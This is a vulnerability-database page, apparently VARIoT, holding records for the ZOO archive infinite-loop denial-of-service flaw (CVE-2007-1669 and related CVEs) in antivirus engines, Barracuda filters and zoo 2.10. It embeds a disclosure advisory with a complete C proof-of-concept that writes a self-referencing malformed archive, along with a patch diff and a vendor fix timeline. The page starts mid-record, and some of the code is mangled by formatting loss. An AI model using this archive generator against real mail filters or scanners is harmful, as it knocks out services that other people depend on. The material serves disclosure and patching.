}\n\n         memset (hdr, 0x00, 4096);\n\n         // Build a ZOO header\n         memcpy          (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n         put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);\n         put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n         put_longword    (hdr + ZH_NEG_START_OFFSET,\n             (ZOO_HEADER_SIZE) * -1);\n         put_byte        (hdr + ZH_MAJ_VER, 2);\n         put_byte        (hdr + ZH_MIN_VER, 0);\n         put_byte        (hdr + ZH_ARC_HTYPE, 1);\n         put_longword    (hdr + ZH_ARC_COMMENT, 0);\n         put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n         put_byte        (hdr + ZH_VERSION_DATA, 3);\n\n         // Build vulnerable direntry struct\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n         memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n                             \"AAAAAAAA.AAA\", 13);\n\n         total_size = ZOO_HEADER_SIZE + 51;\n\n         fp = open_file (filename);\n\n         if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n                 printf (\"The file has been written\\n\");\n         } else {\n                 printf (\"Cant write to the file\\n\");\n                 exit (1);\n         }\n\n         fclose (fp);\n\n         return 0;\n}\n\n\nVII.    PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing.  This will\nguarantee the fact that it's not possible to process the same files over\nand over again.  Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c        1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c        2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n  #endif\n  struct direntry direntry;                 /* directory entry */\n  int first_dir = 1;\n  /* first dir entry seen? */\n+unsigned long zoo_pointer = 0;                     /* Track our position\nin the file */\n\n  static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n  static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n                 exit_status = 1;\n     }\n     zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n     begins */\n+\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n  }\n\n  #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n     } /* end if */\n\n  loop_again:\n+\n+   /* Make sure we are not seeking to already processed data */\n+   if (next_ptr <= zoo_pointer)\n+          prterror ('f', \"ZOO chain structure is corrupted\\n\");\n+   zoo_pointer = next_ptr;\n+\n     zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n  } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c       1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c       2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n  int show_mode = 0;                             /* show file protection */\n  #endif\n  int first_dir = 1;                             /* if first direntry -- to\n  adjust dat_ofs */\n+unsigned long zoo_pointer = 0;         /* Track our position in the file\n*/\n\n  while (*option) {\n     switch (*option) {\n@@ -211,6 +212,9 @@\n                 show_acmt (&zoo_header, zoo_file, 0);           /* show\n                 archive comment */\n         }\n\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n+\n     /* Seek to the beginning of the first directory entry */\n     if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n        ercount++;\n@@ -437,6 +441,11 @@\n           if (verb_list && !fast)\n              show_comment (&direntry, zoo_file, 0, (char *) NULL);\n        } /* end if (lots of conditions) */\n+\n+      /* Make sure we are not seeking to already processed data */\n+      if (direntry.next <= zoo_pointer)\n+               prterror ('f', \"ZOO chain structure is corrupted\\n\");\n+      zoo_pointer = direntry.next;\n\n                 /* ..seek to next dir entry */\n        zooseek (zoo_file, direntry.next, 0);\n\n\nVIII.   CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX.     REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX.      HISTORY\n\n2006-09-??  : Vulnerability is found\n2007-03-19  : All vendors notified\n2007-03-19  : Barracuda Networks provided a fix\n2007-03-22  : Avira provided a fix\n2007-04-02  : Panda Antivirus provided a fix\n2007-04-14  : avast! antivirus provided a fix\n2007-05-04  : Public disclosure\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
      ],
      trust: 2.16,
   },
   exploit_availability: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            reference: "https://www.scap.org.cn/vuln/vhn-25031",
            trust: 0.1,
            type: "unknown",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
      ],
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2007-1669",
            trust: 2.9,
         },
         {
            db: "BID",
            id: "23823",
            trust: 2,
         },
         {
            db: "SECUNIA",
            id: "25122",
            trust: 1.8,
         },
         {
            db: "SECUNIA",
            id: "25315",
            trust: 1.7,
         },
         {
            db: "VUPEN",
            id: "ADV-2007-1699",
            trust: 1.7,
         },
         {
            db: "SREASON",
            id: "2680",
            trust: 1.7,
         },
         {
            db: "OSVDB",
            id: "35795",
            trust: 1.7,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
            trust: 0.8,
         },
         {
            db: "XF",
            id: "34080",
            trust: 0.6,
         },
         {
            db: "BUGTRAQ",
            id: "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS",
            trust: 0.6,
         },
         {
            db: "VIM",
            id: "20070724 ZOO - AMAVIS - BARRACUDA CROSS-REF PROBLEMS",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
            trust: 0.6,
         },
         {
            db: "EXPLOIT-DB",
            id: "3851",
            trust: 0.1,
         },
         {
            db: "VULHUB",
            id: "VHN-25031",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "56548",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "56479",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   id: "VAR-200705-0183",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:12:33.927000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://amavis.org/",
         },
         {
            title: "Barracuda Spam & Virus Firewall",
            trust: 0.8,
            url: "http://www.barracudanetworks.com/ns/products/spam_overview.php",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "NVD-CWE-Other",
            trust: 1,
         },
         {
            problemtype: "CWE-DesignError",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/bid/23823",
         },
         {
            trust: 1.7,
            url: "http://www.amavis.org/security/asa-2007-2.txt",
         },
         {
            trust: 1.7,
            url: "http://www.osvdb.org/35795",
         },
         {
            trust: 1.7,
            url: "http://secunia.com/advisories/25122",
         },
         {
            trust: 1.7,
            url: "http://secunia.com/advisories/25315",
         },
         {
            trust: 1.7,
            url: "http://securityreason.com/securityalert/2680",
         },
         {
            trust: 1.7,
            url: "http://www.attrition.org/pipermail/vim/2007-july/001725.html",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
         },
         {
            trust: 1.1,
            url: "http://www.vupen.com/english/advisories/2007/1699",
         },
         {
            trust: 1.1,
            url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
         },
         {
            trust: 0.9,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1669",
         },
         {
            trust: 0.6,
            url: "http://www.barracudanetworks.com/ns/products/spam_overview.php",
         },
         {
            trust: 0.6,
            url: "http://xforce.iss.net/xforce/xfdb/34080",
         },
         {
            trust: 0.6,
            url: "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded",
         },
         {
            trust: 0.6,
            url: "http://www.frsirt.com/english/advisories/2007/1699",
         },
         {
            trust: 0.3,
            url: "http://www.avast.com",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.pandasoftware.com/",
         },
         {
            trust: 0.3,
            url: "http://www.picozip.com/",
         },
         {
            trust: 0.3,
            url: "http://www.winace.com/",
         },
         {
            trust: 0.3,
            url: "/archive/1/467646",
         },
         {
            trust: 0.3,
            url: "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c",
         },
         {
            trust: 0.1,
            url: "http://www.barracudanetworks.com/ns/resources/tech_alert.php",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/secunia_security_advisories/",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/network_software_inspector/",
         },
         {
            trust: 0.1,
            url: "http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/product/4639/",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/advisories/25122/",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/about_secunia_advisories/",
         },
         {
            trust: 0.1,
            url: "http://www.guay-leroux.com",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2007-05-09T00:00:00",
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            date: "2007-05-04T00:00:00",
            db: "BID",
            id: "23823",
         },
         {
            date: "2012-06-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            date: "2007-05-10T00:32:46",
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            date: "2007-05-04T16:51:04",
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            date: "2007-05-09T00:19:00",
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            date: "2007-05-08T00:00:00",
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-10-16T00:00:00",
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            date: "2016-07-06T14:39:00",
            db: "BID",
            id: "23823",
         },
         {
            date: "2012-06-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            date: "2018-10-16T16:40:20.380000",
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            date: "2007-05-10T00:00:00",
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Barracuda Spam Firewall Used in etc.  zoo decoder Service disruption in  (DoS) Vulnerabilities",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Design Error",
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
      trust: 0.9,
   },
}

var-200705-0187
Vulnerability from variot

unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite loop DoS

Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673

I. BACKGROUND

Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.

II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition.

III. AFFECTED SOFTWARES

o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip

IV. IMPACT

If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.

If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.

V. SOLUTION

o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.

o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.

o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.

o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007.

o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.

o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.

o WinAce was contacted but no response was received from them.

o PicoZip was contacted but no response was received from them.

VI. PROOF OF CONCEPT

Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.

Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.

/*

Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS

coded by Jean-S\xe9bastien Guay-Leroux September 2006

*/

include

include

include

// Structure of a ZOO header

define ZOO_HEADER_SIZE 0x0000002a

define ZH_TEXT 0

define ZH_TAG 20

define ZH_START_OFFSET 24

define ZH_NEG_START_OFFSET 28

define ZH_MAJ_VER 32

define ZH_MIN_VER 33

define ZH_ARC_HTYPE 34

define ZH_ARC_COMMENT 35

define ZH_ARC_COMMENT_LENGTH 39

define ZH_VERSION_DATA 41

define D_DIRENTRY_LENGTH 56

define D_TAG 0

define D_TYPE 4

define D_PACKING_METHOD 5

define D_NEXT_ENTRY 6

define D_OFFSET 10

define D_DATE 14

define D_TIME 16

define D_FILE_CRC 18

define D_ORIGINAL_SIZE 20

define D_SIZE_NOW 24

define D_MAJ_VER 28

define D_MIN_VER 29

define D_DELETED 30

define D_FILE_STRUCT 31

define D_COMMENT_OFFSET 32

define D_COMMENT_SIZE 36

define D_FILENAME 38

define D_VAR_DIR_LEN 51

define D_TIMEZONE 53

define D_DIR_CRC 54

define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )

define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )

define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

void put_byte (char ptr, unsigned char data) { ptr = data; }

void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); }

void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); }

FILE * open_file (char *filename) {

     FILE *fp;

     fp = fopen ( filename , "w" );

     if (!fp) {
             perror ("Cant open file");
             exit (1);
     }

     return fp;

}

void usage (char *progname) {

     printf ("\nTo use:\n");
     printf ("%s <archive name>\n\n", progname);

     exit (1);

}

int main (int argc, char argv[]) { FILE fp; char hdr = (char ) malloc (4096); char filename = (char ) malloc (256); int written_bytes; int total_size;

     if ( argc != 2) {
             usage ( argv[0] );
     }

     strncpy (filename, argv[1], 255);

     if (!hdr || !filename) {
             perror ("Error allocating memory");
             exit (1);
     }

     memset (hdr, 0x00, 4096);

     // Build a ZOO header
     memcpy          (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
     put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);
     put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
     put_longword    (hdr + ZH_NEG_START_OFFSET,
         (ZOO_HEADER_SIZE) * -1);
     put_byte        (hdr + ZH_MAJ_VER, 2);
     put_byte        (hdr + ZH_MIN_VER, 0);
     put_byte        (hdr + ZH_ARC_HTYPE, 1);
     put_longword    (hdr + ZH_ARC_COMMENT, 0);
     put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);
     put_byte        (hdr + ZH_VERSION_DATA, 3);

     // Build vulnerable direntry struct
     put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
     put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
     put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
     put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
     put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
     memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,
                         "AAAAAAAA.AAA", 13);

     total_size = ZOO_HEADER_SIZE + 51;

     fp = open_file (filename);

     if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
             printf ("The file has been written\n");
     } else {
             printf ("Cant write to the file\n");
             exit (1);
     }

     fclose (fp);

     return 0;

}

VII. PATCH

To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems:

diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /

static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }

#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /

loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /

diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /

while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }

  • / Begin tracking our position in the file /
  • zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
  • / Make sure we are not seeking to already processed data /
  • if (direntry.next <= zoo_pointer)
  • prterror ('f', "ZOO chain structure is corrupted\n");
  • zoo_pointer = direntry.next;
             /* ..seek to next dir entry */
    zooseek (zoo_file, direntry.next, 0);
    

VIII. CREDITS

Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.

IX. REFERENCES

  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669

  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670

  3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671

  4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672

  5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673

X. HISTORY

2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-200705-0187",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "amavis",
            scope: "lte",
            trust: 1.8,
            vendor: "amavis",
            version: "2.4.1",
         },
         {
            model: "antivir personal",
            scope: "eq",
            trust: 1.6,
            vendor: "avira",
            version: "7",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1.3,
            vendor: "avira",
